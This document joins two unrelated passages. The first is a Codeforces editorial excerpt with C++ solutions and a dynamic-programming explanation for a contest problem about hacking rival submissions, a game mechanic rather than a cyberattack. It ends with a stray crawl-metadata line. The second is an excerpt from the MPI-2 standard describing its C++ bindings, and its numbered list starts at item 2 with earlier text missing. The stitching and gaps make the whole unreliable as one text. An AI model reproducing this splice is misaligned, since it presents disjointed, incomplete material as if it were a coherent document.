#include<bits/stdc++.h> using namespace std; char s[100000]; int col[100000], dp[21][1 << 20]; int main() { int n, m; scanf("%d %d", &n, &m); for (int i = 0; i < n; i++) { scanf(" %s", s); for (int j = 0; j < m; j++) col[j] |= (s[j] - '0') << i; } for (int i = 0; i < m; i++) dp[0][col[i]]++; for (int k = 1; k <= n; k++) for (int mask = 0; mask < (1 << n); mask++) { int sum = k > 1 ? (k - 2 - n) * dp[k - 2][mask] : 0; for (int p = 0; p < n; p++) sum += dp[k - 1][mask ^ (1 << p)]; dp[k][mask] = sum / k; } int ans = n * m; for (int mask = 0; mask < (1 << n); mask++) { int cnt = 0; for (int k = 0; k <= n; k++) cnt += min(k, n - k) * dp[k][mask]; ans = min(ans, cnt); } printf("%d\\n", ans); return 0; }
662E - To Hack or not to Hack
Author of the idea — Alex_2oo8
Observation number one — as you are the only participant who is able to hack, the total score of any other participant cannot exceed 9000 (3 problems for 3000 points). Hence hacking at least 90 solutions automatically guarantees the first place (the hacks alone increase the score by 9000 points).
Now we are left with the problem where the number of hacks we make is at most 90. We can try each of the 63 possible score assignments for the problems in the end of the round. As we know the final score for each problem, we can calculate the maximum number of hacks we are allowed to make so the problem gets the assigned score. This is also the exact amount of hacks we will make in that problem. As we know the number of hacks we will make, we can calculate our final total score. Now there are at most 90 participants who we can possibly hack. We are interested only in those who are on top of us. By hacking we want to make their final score less than that of us. This problem can by solved by means of dynamic programming:
dp[p][i][j][k] — the maximum number of participants among the top p, whom we can push below us by hacking first problem i times, second problem j times and third problem k times.
The recurrence: we pick a subset of solutions of the current participant that we will hack, and if after these hacks we will push him below us, we update the corresponding dp state. For example, if it is enough to hack the first and the third problems, then dp[p + 1][i + 1][j][k + 1] = max(dp[p + 1][i + 1][j][k + 1], dp[p][i][j][k] + 1)
BONUS Can you solve this problem if each hack gives only 10 points, not 100?
#include<bits/stdc++.h> #define time ololo using namespace std; int time[5000][3], n, solved[3], canHack[3], score[3], willHack[3], bestPlace, dp[2][90][90][90], ci, li; int submissionScore(int sc, int tm) { if (tm == 0) return 0; return sc * (250 - abs(tm)) / 250; } int calcScore(int p) { int sum = 0; for (int i = 0; i < 3; i++) sum += submissionScore(score[i], time[p][i]); return sum; } int countHacks(int p) { int cnt = 0; for (int i = 0; i < 3; i++) cnt += time[p][i] < 0; return cnt; } int solve() { memset(dp, 0, sizeof dp); int myScore = 0; for (int i = 0; i < 3; i++) myScore += 100 * willHack[i] + submissionScore(score[i], time[0][i]); ci = 0; li = 1; for (int p = 1; p < n; p++) if (countHacks(p) > 0 && calcScore(p) > myScore) { ci ^= 1; li ^= 1; for (int i = 0; i <= willHack[0]; i++) for (int j = 0; j <= willHack[1]; j++) for (int k = 0; k <= willHack[2]; k++) dp[ci][i][j][k] = dp[li][i][j][k]; for (int ii = 0; ii < 2; ii++) for (int jj = 0; jj < 2; jj++) for (int kk = 0; kk < 2; kk++) { if (ii == 1 && time[p][0] >= 0) continue; if (jj == 1 && time[p][1] >= 0) continue; if (kk == 1 && time[p][2] >= 0) continue; int s = submissionScore(score[0], time[p][0]) * (ii ^ 1) + submissionScore(score[1], time[p][1]) * (jj ^ 1) + submissionScore(score[2], time[p][2]) * (kk ^ 1); if (s > myScore) continue; for (int i = ii; i <= willHack[0]; i++) for (int j = jj; j <= willHack[1]; j++) for (int k = kk; k <= willHack[2]; k++) dp[ci][i][j][k] = max(dp[ci][i][j][k], dp[li][i - ii][j - jj][k - kk] + 1); } } int res = 1 - dp[ci][willHack[0]][willHack[1]][willHack[2]]; for (int p = 1; p < n; p++) if (calcScore(p) > myScore) res++; return res; } void brute(int p) { if (p == 3) { int res = solve(); bestPlace = min(bestPlace, res); return; } for (int i = 0; i < 6; i++) { int mn = i == 5 ? 
0 : (n >> (i + 1)) + 1; int mx = (n >> i); if (solved[p] >= mn && solved[p] - canHack[p] <= mx) { score[p] = 500 * (i + 1); willHack[p] = min(canHack[p], solved[p] - mn); brute(p + 1); } } } int main() { memset(solved, 0, sizeof solved); memset(canHack, 0, sizeof canHack); scanf("%d", &n); for (int i = 0; i < n; i++) for (int j = 0; j < 3; j++) { scanf("%d", &time[i][j]); solved[j] += time[i][j] != 0; canHack[j] += time[i][j] < 0; } if (canHack[0] + canHack[1] + canHack[2] > 89) { printf("1\\n"); return 0; } bestPlace = n; brute(0); printf("%d\\n", bestPlace); return 0; } | http://codeforces.com/blog/entry/44408 | CC-MAIN-2017-51 | refinedweb | 3,191 | 71.48 |
import "golang.org/x/exp/io/i2c/driver"
Package driver contains interfaces to be implemented by various I2C implementations.
type Conn interface { // Tx first writes w (if not nil), then reads len(r) // bytes from device into r (if not nil) in a single // I2C transaction. Tx(w, r []byte) error // Close closes the connection. Close() error }
Conn represents an active connection to an I2C device.
Opener opens a connection to an I2C device to communicate with the I2C address given. If the address is an 10-bit I2C address, tenbit is true.
Package driver is imported by 13 packages. Updated 2017-10-03. Refresh now. Tools for package owners. | https://godoc.org/golang.org/x/exp/io/i2c/driver | CC-MAIN-2017-43 | refinedweb | 110 | 58.89 |
My teammate came to me and asked, how to figure out the number of business days between two given dates? My immediate reply was, loop through start date to end date. But after some time, I realized that this solution is not optimized. So I started developing my own optimized algorithm.
In this article we will discuss the algorithm and see the implementation on SQL Server 2000 and also some C# code.
Let’s start with algorithms first. Here are the key factors that are involved in the calculation.
This depends on the company/country policies. In the US, it's generally 5 days per week, whereas in India and in many other countries, many companies work for 6 days a week. Our algorithm needs to take that into consideration.
The second factor is the number of holidays during a specified period. Again that depends on company policy. We can maintain these details in one table. That is simple too.
Simple enough hum…!!!
As we know the number of working days per week, and as the pattern repeats every week, first we will calculate the number of complete weeks. We should deduct one from the number of weeks. Once we get the number of weeks, we can then multiply by the number of working days and arrive at a rough number of business days.
OK, so we have a rough number of business days, say D. I am calling it ruff number as it is not the exact answer, as we have deducted one week in the first step.
Now, we will find out how many days are there in the starting week. For example if the starting day is Wednesday, the number of days in the starting week is 3 (if number of business days in a week is 5) or 4 (if number of business days in a week is 6).
Similarly, find out how many days are there in the last week. At last, find out how many holidays fall during that time span. That will be a simple aggregation query on the Holiday table.
Once we have all the numbers in hand, based on the mentioned expression, we can come up with our desired answer. Hope this clears all your doubts. So let’s start implementing this algorithm.
First, we will try to implement this on SQL Server using T-SQL.
SQL Server has a number of date functions, two of them are DATEDIFF and DATEPART. That will come handy in this implementation.
DATEDIFF
DATEPART
You can implement this algorithm as a procedure or a function. The preferred one is function but here I will implement this as a procedure so that we can use the print command. Once everything is OK, you can convert it to a procedure by just removing the print command and using return.
print
return
Create procedure SpBusinessDays (@dtStartDate datetime, @dtEndDate datetime,
@indDaysInWeek int)
as
begin
declare
@intWeeks int
,@indDays int
,@intSdays int
,@intEdays int
-- Find the number of weeks between the dates. Subtract 1
-- since we do not want to count the current week.
select @intWeeks = datediff( week, @dtStartDate, @dtEndDate) - 1
print 'week'
print @intWeeks
-- calculate the number of days in these compelete weeks.
select @indDays = @intWeeks * @indDaysInWeek
print 'Est. Days'
print @indDays
-- Get the number of days in the starting week.
if @indDaysInWeek = 5
-- If Saturday, Sunday is holiday
if datepart( dw, @dtStartDate) = 7
select @intSdays = 7 - datepart( dw, @dtStartDate)
else
select @intSdays = 7 - datepart( dw, @dtStartDate) - 1
else
-- If Sunday is only <st1:place>Holiday</st1:place>
select @intSdays = 7 - datepart( dw, @dtStartDate)
print 'Starting Days'
print @intSdays
-- Calculate the days in the last week.
if @indDaysInWeek = 5
if datepart( dw, @dtEndDate) = 7
select @intEdays = datepart( dw, @dtEndDate) - 2
else
select @intEdays = datepart( dw, @dtEndDate) - 1
else
select @intEdays = datepart( dw, @dtEndDate) - 1
print 'End Days'
print @intEdays
-- Sum everything together.
select @indDays = @indDays + @intSdays + @intEdays
print 'Ans'
print @indDays
end
Note: Starting date is Exclusive.
Here if you notice, if the number of working days is 6, we need not worry about any thing, we can simply count the days. If the number of working days is 5 then we have to take care of Saturday.
That’s it. It’s simple.
OK, but let’s say if you calculate this on your presentation layer, the stored procedure or “function” will not work. So now we will implement the same algorithm in C#.
Here is the implementation in C#:
/// <summary>
/// Calulates Business Days within the given range of days.
/// Start date and End date inclusive.
/// </summary>
/// <param name="startDate">Datetime object
/// containing Starting Date</param>
/// <param name="EndDate">Datetime object containing
/// End Date</param>
/// <param name="NoOfDayWeek">integer denoting No of Business
/// Day in a week</param>
/// <param name="DayType"> DayType=0 for Business Day and
/// DayType=1 for WeekEnds </param>
/// <returns></returns>
public static double CalculateBDay(
DateTime startDate,
DateTime EndDate,
int NoOfDayWeek, /* No of Working Day per week*/
int DayType
)
{
double iWeek, iDays, isDays, ieDays;
//* Find the number of weeks between the dates. Subtract 1 */
// since we do not want to count the current week. * /
iWeek =DateDiff("ww",startDate,EndDate)-1 ;
iDays = iWeek * NoOfDayWeek;
//
if( NoOfDayWeek == 5)
{
//-- If Saturday, Sunday is holiday
if ( startDate.DayOfWeek == DayOfWeek.Saturday )
isDays = 7 -(int) startDate.DayOfWeek;
else
isDays = 7 - (int)startDate.DayOfWeek - 1;
}
else
{
//-- If Sunday is only <st1:place>Holiday</st1:place>
isDays = 7 - (int)startDate.DayOfWeek;
}
//-- Calculate the days in the last week. These are not included in the
//-- week calculation. Since we are starting with the end date, we only
//-- remove the Sunday (datepart=1) from the number of days. If the end
//-- date is Saturday, correct for this.
if( NoOfDayWeek == 5)
{
if( EndDate.DayOfWeek == DayOfWeek.Saturday )
ieDays = (int)EndDate.DayOfWeek - 2;
else
ieDays = (int)EndDate.DayOfWeek - 1;
}
else
{
ieDays = (int)EndDate.DayOfWeek - 1 ;
}
//-- Sum everything together.
iDays = iDays + isDays + ieDays;
if(DayType ==0)
return iDays;
else
return T.Days - iDays;
}
DateDiff
While I was working on this issue, I also came across another issue with DateTime functions in C#. I came to know that C# does not have important functions like DateDiff, found in VB.NET. So I have included that in the same library. As Tim McCurdy said we can include Microsoft.VisualBasic.dll to our project and use DateDiff function implemented by the VB team, but I have noticed many people don't like the idea of mixing C# code with VB.NET code, though it is technically perfectly fine. Second problem with calculation of week, month or year is, they are not simple. You can not get the number of weeks = TimeSpan.Totaldays / 7. The rule says, number of week equals to number of time you cross the week boundary for given duration. To solve this problem I have added a new function called GetWeeks.
DateTime
TimeSpan.Totaldays
GetWeeks
/// <summary>
/// Calculate weeks between starting date and ending date
/// </summary>
/// <param name="stdate"></param>
/// <param name="eddate"></param>
/// <returns></returns>
public static int GetWeeks(DateTime stdate, DateTime eddate )
{
TimeSpan t= eddate - stdate;
int iDays;
if( t.Days < 7)
{
if(stdate.DayOfWeek > eddate.DayOfWeek)
return 1; //It is accross the week
else
return 0; // same week
}
else
{
iDays = t.Days -7 +(int) stdate.DayOfWeek ;
int i=0;
int k=0;
for(i=1;k<iDays ;i++)
{
k+=7;
}
if(i>1 && eddate.DayOfWeek != DayOfWeek.Sunday ) i-=1;
return i;
}
}
/// <summary>
/// Mimic the Implementation of DateDiff function of VB.Net.
/// Note : Number of Year/Month is calculated
/// as how many times you have crossed the boundry.
/// e.g. if you say starting date is 29/01/2005
/// and 01/02/2005 the year will be 0,month will be 1.
///
/// </summary>
/// <param name="datePart">specifies on which part
/// of the date to calculate the difference </param>
/// <param name="startDate">Datetime object containing
/// the beginning date for the calculation</param>
/// <param name="endDate">Datetime object containing
/// the ending date for the calculation</param>
/// <returns></returns>
public static double DateDiff(string datePart,
DateTime startDate, DateTime endDate)
{
//Get the difference in terms of TimeSpan
TimeSpan T;
T = endDate - startDate;
//Get the difference in terms of Month and Year.
int sMonth, eMonth, sYear, eYear;
sMonth = startDate.Month;
eMonth = endDate.Month;
sYear = startDate.Year;
eYear = endDate.Year;
double Months,Years=0;
Months = eMonth - sMonth;
Years = eYear - sYear;
Months = Months + ( Years*12);
switch(datePart.ToUpper())
{
case "WW":
case "DW":
return (double)GetWeeks(startDate,endDate);
case "MM":
return Months;
case "YY":
case "YYYY":
return Years;
case "QQ":
case "QQQQ":
//Difference in Terms of Quater
return Math.Ceiling((double)T.Days/90.0);
case "MI":
case "N":
return T.TotalMinutes ;
case "HH":
return T.TotalHours ;
case "SS":
return T.TotalSeconds;
case "MS":
return T.TotalMilliseconds;
case "DD":
default:
return T.Days;
}
}
This is a simple calculation compared to business days. I have added the function that can calculate the age on a specified date, in terms of year, month and days:
/// <summary>
/// Calculate Age on given date.
/// Calculates as Years, Months and Days.
/// </summary>
/// <param name="DOB">Datetime object
/// containing DOB value</param>
/// <param name="OnDate">Datetime object containing given
/// date, for which we need to calculate the age</param>
/// <returns></returns>
public static string Age(DateTime DOB, DateTime OnDate)
{
//Get the difference in terms of Month and Year.
int sMonth, eMonth, sYear, eYear;
double Months, Years;
sMonth = DOB.Month;
eMonth = OnDate.Month;
sYear = DOB.Year;
eYear = OnDate.Year;
// calculate Year
if( eMonth >= sMonth)
Years = eYear - sYear;
else
Years = eYear - sYear -1;
//calculate Months
if( eMonth >= sMonth)
Months = eMonth - sMonth;
else
if ( OnDate.Day > DOB.Day)
Months = (12-sMonth)+eMonth-1;
else
Months = (12-sMonth)+eMonth-2;
double tDays=0;
//calculate Days
if( eMonth != sMonth && OnDate.Day != DOB.Day )
{
if(OnDate.Day > DOB.Day)
tDays = DateTime.DaysInMonth(OnDate.Year,
OnDate.Month) - DOB.Day;
else
tDays = DateTime.DaysInMonth(OnDate.Year,
OnDate.Month-1) - DOB.Day + OnDate.Day ;
}
string strAge = Years+"/"+Months+"/"+tDays;
return strAge;
}
If you notice the algorithm, I have talked about holidays too, but I have not implemented this in any of the above code but that can be taken care of by a simple query. So I am leaving that up to you. Do let me know if you like this code, or if it was useful in your project. You can mail me at Gaurang.Desai@gmail.com.
This article has no explicit license attached to it but may contain usage terms in the article text or the download files themselves. If in doubt please contact the author via the discussion board below.
A list of licenses authors might use can be found here
public static int GetFullWorkingDaysBetween(DateTime firstDate, DateTime lastDate, IEnumerable<DateTime> holidays)
{
if (firstDate > lastDate)// Swap the dates if firstDate > lastDate
{
DateTime tempDate = firstDate;
firstDate = lastDate;
lastDate = tempDate;
}
int days = (int)(lastDate.Subtract(firstDate).Ticks / TimeSpan.TicksPerDay);
int weekReminder = days % 7;
if (weekReminder > 0)
{
switch (firstDate.DayOfWeek)
{
case DayOfWeek.Monday:
days = days - ((weekReminder > 5) ? 1 : 0);
// Another way for this:
//days = days - ((int)weekReminder % 5);
// but i think its more expensive
break;
case DayOfWeek.Tuesday:
days = days - ((weekReminder > 4) ? 1 : 0) - ((weekReminder > 5) ? 1 : 0);
// The same from above
//days = days - ((int)weekReminder % 4);
break;
case DayOfWeek.Wednesday:
days = days - ((weekReminder > 3) ? 1 : 0) - ((weekReminder > 4) ? 1 : 0);
break;
case DayOfWeek.Thursday:
days = days - ((weekReminder > 2) ? 1 : 0) - ((weekReminder > 3) ? 1 : 0);
break;
case DayOfWeek.Friday:
days = days - ((weekReminder > 1) ? 1 : 0) - ((weekReminder > 2) ? 1 : 0);
break;
case DayOfWeek.Saturday:
days = days - 1 - ((weekReminder > 1) ? 1 : 0);
break;
case DayOfWeek.Sunday:
days = days - 1;
break;
}
}
days = days - (2 * ((int)days / 7));
if (holidays != null && holidays.Count() > 0)
{
foreach (DateTime holiday in holidays.Where(h => h >= firstDate && h < lastDate))
{
DayOfWeek dayOfWeekOfHoliday = holiday.DayOfWeek;
if (dayOfWeekOfHoliday != DayOfWeek.Saturday && dayOfWeekOfHoliday != DayOfWeek.Sunday)
{
days = days - 1;
}
}
}
return days;
}
DateTime dtDate = DateTime.Parse("07/01/2005"); // Date
TimeSpan tSpan = new TimeSpan(14,0,0,0); // 1 Week
// Display the Date for 1 Week ago
System.Diagnostics.Trace.WriteLine(dtDate.Subtract(tSpan));
// Display the Date for 1 Week in the future
System.Diagnostics.Trace.WriteLine(dtDate.Add(tSpan));
DateTime dtStart = DateTime.Today;
DateTime dtEnd = DateTime.Now;
TimeSpan tSpan = dtEnd.Subtract(dtStart);
System.Diagnostics.Trace.WriteLine("Duration: " + tSpan.ToString());
System.Diagnostics.Trace.WriteLine("Total Weeks: " + (tSpan.TotalDays / 7));
System.Diagnostics.Trace.WriteLine("Total Days: " + tSpan.TotalDays);
System.Diagnostics.Trace.WriteLine("Total Hours: " + tSpan.TotalHours);
System.Diagnostics.Trace.WriteLine("Total Minutes: " + tSpan.TotalMinutes);
Microsoft.VisualBasic
long nValue = Microsoft.VisualBasic.DateAndTime.DateDiff(
Microsoft.VisualBasic.DateInterval.WeekOfYear,
dtStart, dtEnd,
Microsoft.VisualBasic.FirstDayOfWeek.Sunday,
Microsoft.VisualBasic.FirstWeekOfYear.Jan1);
System.Diagnostics.Trace.WriteLine("Week No: " + nValue);
General News Suggestion Question Bug Answer Joke Praise Rant Admin
Use Ctrl+Left/Right to switch messages, Ctrl+Up/Down to switch threads, Ctrl+Shift+Left/Right to switch pages. | https://www.codeproject.com/articles/10641/optimized-calculation-algorithm-for-business-days?msg=2838398 | CC-MAIN-2017-13 | refinedweb | 2,106 | 58.89 |
On Wed, 5 May 1999, Vlad Harchev wrote: >[...] Here is a small patch (that should be applied after one sent recently), that will make entire functionality turnable on/off by macro NO_EXT_LYNXCFG. So if lynx-developers fear to include this functionality unconditionally, it can be declared 'experimental feature'. As for *.htmls, I think they should be installed unconditionally (but we can make makefile target that will remove them from $(helpdir) - like '-rm -rf %(helpdir)/lynxcfg'). Best regards, -Vlad --- LYReadCFG.c~ Wed May 5 19:51:33 1999 +++ LYReadCFG.c Thu May 6 01:34:07 1999 @@ -32,6 +32,9 @@ #ifndef NO_EXT_LYNXCFG # define EXT_LYNXCFG +# define INCLUDE_OPTDOC_HREF /*undef this if you don't wish links to + documentation on the settings showed in the LYNXCFG:// page. This macro can + be defined even if NO_EXT_LYNXCFG is defined. */ #endif #ifdef EXT_LYNXCFG | http://lists.gnu.org/archive/html/lynx-dev/1999-05/msg00336.html | CC-MAIN-2016-07 | refinedweb | 137 | 57.37 |
In this section, you will learn how to get the name of the file.
Description of code:
You can see in the given example, we have created an object of File class and specified a file in the constructor. Then we have called the method getName() through the object of File class which returns the name of the file.
Here is the code:
import java.io.*; public class FileGetName { public static void main(String[] args) { File file = new File("C:/Answers/File/out.txt"); String st = file.getName(); System.out.println("File name is: " + st); } }
Through the method getName() of File class, you can get the name of any file.
Output:
Advertisements
Posted on: April | http://www.roseindia.net/tutorial/java/core/files/filegetname.html | CC-MAIN-2016-44 | refinedweb | 115 | 75.2 |
React + Redux — Best Practices
This article mainly focuses on implementing some good practices I follow when building large scale applications with React and Redux.
Differentiate Presentational Components and Container Components.
When architecting a React application with Redux, we should split our components into presentational and container components.
Presentational components are components that render markup. They are written as stateless functional components unless they need local state or lifecycle hooks. Presentational components do not interact with the Redux store; they receive data via props and render it.
Container components are for getting data from redux store and providing the data to the presentational components. They tend to be stateful.
A presentational component should be written as a stateless functional component.
A container component should also be kept as a simple function, unless you are forced to use React component lifecycle methods, in which case write it as a class.
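Here is a minimal runnable sketch of the split. It uses a plain h() helper in place of React.createElement so it runs without React; the TalentList name and the state shape are illustrative, not from a real app:

```javascript
// Minimal stand-in for React.createElement so the sketch runs without React
const h = (type, props, ...children) => ({ type, props, children });

// Presentational: stateless, knows nothing about the store, renders its props
const TalentList = ({ talents }) =>
  h('ul', null, ...talents.map(t => h('li', { key: t.id }, t.name)));

// Container side: selects data out of the (hypothetical) redux state tree;
// in a real app react-redux's connect(mapStateToProps)(TalentList) wires them up
const mapStateToProps = state => ({ talents: state.talentPool.items });

const state = {
  talentPool: { items: [{ id: 1, name: 'Ada' }, { id: 2, name: 'Lin' }] }
};
const tree = TalentList(mapStateToProps(state));
// tree.children.length → 2
```

The presentational half stays a pure function of its props, so it can be rendered and asserted on without any store at all.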
Points to be noted:
- Stateless functional components give improved performance: they avoid unnecessary checks and memory allocations.
- Components are easier to test when you keep them as simple as possible by splitting them into presentational and container components.
Use bindActionCreators for dispatching actions
Redux’s event dispatching system is the heart of its state management functionality. However, it can be tedious to pass down the dispatch function as a prop to every component that needs to dispatch an action.
Avoid threading the dispatch function down through props and calling it by hand inside every component. Instead, wrap your action creators with bindActionCreators inside mapDispatchToProps.
Once wrapped, the filterTalentPoolDataBySkills action creator is available as this.props.filterTalentPoolDataBySkills, already wired to dispatch the action. This makes the code easier to maintain in the long run.
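A hand-rolled sketch of what bindActionCreators does under the hood (the real helper comes from redux; filterTalentPoolDataBySkills and its action shape are assumed for illustration):

```javascript
// What redux's bindActionCreators does, reimplemented for illustration
const bindActionCreators = (creators, dispatch) =>
  Object.keys(creators).reduce((bound, name) => {
    bound[name] = (...args) => dispatch(creators[name](...args));
    return bound;
  }, {});

// Illustrative action creator, matching the name used in the article
const filterTalentPoolDataBySkills = skills =>
  ({ type: 'FILTER_BY_SKILLS', skills });

const dispatched = [];
const dispatch = action => dispatched.push(action);

// What mapDispatchToProps hands your component: props that dispatch when called
const props = bindActionCreators({ filterTalentPoolDataBySkills }, dispatch);
props.filterTalentPoolDataBySkills(['react', 'redux']);
// dispatched[0] → { type: 'FILTER_BY_SKILLS', skills: ['react', 'redux'] }
```

The component only ever calls this.props.filterTalentPoolDataBySkills(...); no dispatch reference needs to be passed down.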
Try to avoid using setState and component lifecycle hooks when using Redux:
Manage application state in the Redux store when it is global state, and avoid setState in components that are already connected to Redux. Use component state only where it genuinely makes sense, e.g. a Button component that shows a tooltip when hovered would not use Redux.
Avoid copying store data into local component state with setState. Instead, read the state from the store and render it in the view directly.
With this approach we read state from the Redux store and render it in the view directly. There is no need for setState or extra component lifecycle hooks; Redux does the state management job for you.
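A tiny hand-rolled store, standing in for redux's createStore, shows the idea without React: the global state lives in the store, and subscribers (which react-redux manages for you) are notified on each dispatch. The counter reducer is illustrative:

```javascript
// Minimal createStore sketch: global state lives here, not in setState
const createStore = reducer => {
  let state = reducer(undefined, { type: '@@INIT' });
  const listeners = [];
  return {
    getState: () => state,
    dispatch: action => {
      state = reducer(state, action);
      listeners.forEach(l => l()); // react-redux re-renders connected views here
    },
    subscribe: l => listeners.push(l)
  };
};

const counter = (state = { count: 0 }, action) =>
  action.type === 'INCREMENT' ? { count: state.count + 1 } : state;

const store = createStore(counter);
let renders = 0;
store.subscribe(() => { renders += 1; });

store.dispatch({ type: 'INCREMENT' });
// store.getState() → { count: 1 }, renders → 1
```

The component's job shrinks to rendering store.getState() (via props from connect); no duplicate copy of the data sits in component state.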
Using .bind() in best way:
There are two ways of binding a component method's this scope.
1. Binding them in the constructor.
With this approach only one extra function is created, at component construction time, and that same function is reused every time render executes.
2. Binding at the time of passing the function as a prop value.
The .bind() method creates a new function each time it is run, so this approach allocates a fresh function every time render executes. This has performance implications: hard to notice in small applications, but noticeable in large ones. So it is not preferable to bind a function at the time of passing it as a prop value.
Solution:
- It is better to bind your custom functions in the constructor.
- Alternatively, there is a Babel plugin called the class properties transform, which lets you write auto-bound functions using the fat-arrow syntax.
With class properties and fat arrows, there are no functions left to bind by hand at all.
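The difference between the two approaches can be demonstrated outside React with a plain class (SaveButton and its method are made up for the example):

```javascript
class SaveButton {
  constructor(label) {
    this.label = label;
    // Approach 1: bind once in the constructor
    this.handleClick = this.handleClick.bind(this);
  }
  handleClick() { return `clicked ${this.label}`; }
  render() {
    // Same function reference on every render; child props stay shallow-equal
    return { onClick: this.handleClick };
  }
  renderWithInlineBind() {
    // Approach 2 (anti-pattern): a brand-new function is allocated per render
    return { onClick: this.handleClick.bind(this) };
  }
}

const button = new SaveButton('save');
const stable = button.render().onClick === button.render().onClick;       // true
const unstable = button.renderWithInlineBind().onClick ===
                 button.renderWithInlineBind().onClick;                    // false
```

The stable reference is why constructor binding (or an arrow class property such as handleClick = () => {...}) plays well with shouldComponentUpdate and pure components.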
Use Accessor Functions
For cleaner refactoring, move all functions that do filtering, parsing, and other data-transformation logic into a separate file, and import them for use inside the react-redux connect call.
By doing this it will be easy to add flow types for your functions.
Write cleaner code using ES6 Features
Writing cleaner code will make the developers life easy to understand and maintain the code. ES6 features will give us much cleaner way of writing code in React.
Use Destructuring & spread attributes:
Avoid this.
Instead do this.
Use Arrow functions:
Avoid this:
Instead do this.
Use Flow Types
One thing is certain that type checking is expected to be the future of JS. Generally many developers have a confusion between what to implement between flow and typescript and how smoothly they can be integrated into a current project.
Typescript is more sophisticated to integrate into current project and flow feels simple to introduce, admitting with a warning that it might be inspecting less of your coding as expected.
As the javascript project grows without typing, the more difficult refactoring will become. The larger the project the higher the risk when refactoring. Using type checking may not completely eliminate risk but it will greatly reduce it.
Benifits in using flow:
- On time detection of bugs or errors.
- Communicates the purpose of the function.
- It Scales Down Complex Error Handling.
- Wipes Out Runtime Type Errors.
Use axios library for http requests over jQuery ajax:
Fetch API and axios are the most preferable ways of making http requests. Between those two there are some advantages of using axios library. They are
- It allows performing transforms on data before request is made or after response is received.
- It allows you to alter the request or response entirely (headers as well). also perform async operations before request is made or before Promise settles.
- Built-in XSRF protection.
Use styled-components to style your components
The basic idea of styled-components is to enforce best practices by removing the mapping between styles and components. This way, you can colocate your components with their corresponding styles — resulting in localised class names that do not pollute the global css namespace.
If you decide to use styled-components, do not forget to install plugin to support syntax highlighting in strings or maybe help creating a new one.
Example:
Test your React components
The goal of unit testing is to segregate each part of the program and test that the individual parts are working correctly. It isolates the smallest piece of testable software from the remainder of the code and determines whether it behaves exactly as you expect. We can find bugs in early stage.
In React to test component we use Jest and Enzyme. Jest was created by Facebook and is a testing framework to test javascript and React code. Together with Airbnb’s Enzyme, which is a testing utility, makes it the perfect match to easily test your React application.
Use ES Lint for better coding conventions.
Well run projects have clear consistent coding conventions, with automated enforcement. Besides checking style, linters are also excellent tools for finding certain classes of bugs, such as those related to variable scope. Assignment to undeclared variables and use of undefined variables are examples of errors that are detectable at lint time.
For React specific linting rules go with esint-plugin-react .
For linting flow types rules go with eslint-plugin-flowtype and eslint-plugin-flowtype-errors. | http://brianyang.com/react-redux-best-practices/ | CC-MAIN-2018-22 | refinedweb | 1,129 | 57.06 |
There are places in the standard that give rules for C and not for C++. In these cases, the C rule should be applied to the C++ case, as appropriate. In particular, the values of constants given in the text are the ones for C and Fortran. A cross index of these with the C++ names is given in Annex Language Binding .
We use the ANSI C++ declaration format. All MPI names are declared within the scope of a namespace called MPI and therefore are referenced with an MPI:: prefix. Defined constants are in all capital letters, and class names, defined types, and functions have only their first letter capitalized. Programs must not declare variables or functions in the MPI namespace. This is mandated to avoid possible name collisions.
The definition of named constants, function prototypes, and type definitions must be supplied in an include file mpi.h.
Advice to implementors.
The file mpi.h may contain both the C and C++ definitions.
Usually one can simply use the defined value (generally __cplusplus,
but not required) to see if one is using
C++ to protect the C++ definitions. It is possible that a C compiler
will require that the source protected this way be legal C code. In
this case, all the C++ definitions can be placed in a different
include file and the ``#include'' directive can be used to include the
necessary C++ definitions in the mpi.h file.
( End of advice to implementors.)
C++ functions that create objects or return information usually place the object or information in the return value. Since the language neutral prototypes of MPI functions include the C++ return value as an OUT parameter, semantic descriptions of MPI functions refer to the C++ return value by that parameter name (see Section Function Name Cross Reference ). The remaining C++ functions return void.
In some circumstances, MPI permits users to indicate that they do not want a return value. For example, the user may indicate that the status is not filled in. Unlike C and Fortran where this is achieved through a special input value, in C++ this is done by having two bindings where one has the optional argument and one does not.
C++ functions do not return error codes. If the default error handler has been set to MPI::ERRORS_THROW_EXCEPTIONS, the C++ exception mechanism is used to signal an error by throwing an MPI::Exception object.
It should be noted that the default error handler (i.e., MPI::ERRORS_ARE_FATAL) on a given type has not changed. User error handlers are also permitted. MPI::ERRORS_RETURN simply returns control to the calling function; there is no provision for the user to retrieve the error code.
User callback functions that return integer error codes should not throw exceptions; the returned error will be handled by the MPI implementation by invoking the appropriate error handler.
Advice to users.
C++ programmers that want to handle MPI errors on their own should
use the MPI::ERRORS_THROW_EXCEPTIONS error handler, rather
than MPI::ERRORS_RETURN, that is used for that purpose in
C. Care should be taken using exceptions in mixed language
situations.
( End of advice to users.)
Opaque object handles must be objects in themselves, and have the assignment and equality operators overridden to perform semantically like their C and Fortran counterparts.
Array arguments are indexed from zero.
Logical flags are of type bool.
Choice arguments are pointers of type void *.
Address arguments are of MPI-defined integer type MPI::Aint, defined to be an integer of the size needed to hold any valid address on the target architecture. Analogously, MPI::Offset is an integer to hold file offsets.
Most MPI functions are methods of MPI C++ classes. MPI class names are generated from the language neutral MPI types by dropping the MPI_ prefix and scoping the type within the MPI namespace. For example, MPI_DATATYPE becomes MPI::Datatype.
The names of MPI-2 functions generally follow the naming rules given. In some circumstances, the new MPI-2 function is related to an MPI-1 function with a name that does not follow the naming conventions. In this circumstance, the language neutral name is in analogy to the MPI-1 name even though this gives an MPI-2 name that violates the naming conventions. The C and Fortran names are the same as the language neutral name in this case. However, the C++ names for MPI-1 do reflect the naming rules and can differ from the C and Fortran names. Thus, the analogous name in C++ to the MPI-1 name is different than the language neutral name. This results in the C++ name differing from the language neutral name. An example of this is the language neutral name of MPI_FINALIZED and a C++ name of MPI::Is_finalized.
In C++, function typedefs are made publicly within appropriate classes. However, these declarations then become somewhat cumbersome, as with the following:
typedef MPI::Grequest::Query_function();
would look like the following:
namespace MPI { class Request { // ... }; class Grequest : public MPI::Request { // ... typedef Query_function(void* extra_state, MPI::Status& status); }; };Rather than including this scaffolding when declaring C++ typedefs, we use an abbreviated form. In particular, we explicitly indicate the class and namespace scope for the typedef of the function. Thus, the example above is shown in the text as follows:
typedef int MPI::Grequest::Query_function(void* extra_state, MPI::Status& status)
The C++ bindings presented in Annex MPI-1 C++ Language Binding and throughout this document were generated by applying a simple set of name generation rules to the MPI function specifications. While these guidelines may be sufficient in most cases, they may not be suitable for all situations. In cases of ambiguity or where a specific semantic statement is desired, these guidelines may be superseded as the situation dictates.
2. Arrays of MPI handles are always left in the argument list (whether they are IN or OUT arguments).
